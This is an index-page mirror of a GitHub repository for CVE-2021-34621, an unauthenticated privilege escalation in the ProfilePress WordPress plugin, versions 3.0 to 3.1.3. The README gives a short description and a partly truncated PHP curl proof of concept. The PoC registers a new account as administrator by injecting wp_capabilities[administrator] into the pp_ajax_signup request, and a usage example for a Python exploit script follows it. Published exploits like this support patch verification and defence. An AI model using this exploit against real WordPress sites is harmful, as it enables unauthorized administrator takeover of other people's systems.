Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2021-34621
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
https://github.com/randomrobbiebf/cve-2021-34621
Last synced: about 1 month ago
JSON representation
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2021-34621
- Owner: RandomRobbieBF
- License: gpl-3.0
- Created: 2023-08-09T11:41:56.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-08-09T11:45:32.000Z (over 1 year ago)
- Last Synced: 2023-08-09T13:01:34.500Z (over 1 year ago)
- Language: Python
- Size: 16.6 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CVE-2021-34621
ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation# Description
The user registration functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during registration which made it possible for users to register as an administrator.# POC
```'Hax0r',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r',
'reg_last_name' => 'Hax0r',
'wp_capabilities[administrator]' => '1',
'action' => 'pp_ajax_signup',
'melange_id' => '']);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
```Script Usage
---```
$ python3 CVE-2021-34621.py --url http://wordpress.lan --username test2 --email [email protected] --password test
{"message":"Registration successful.<\/div>"}
```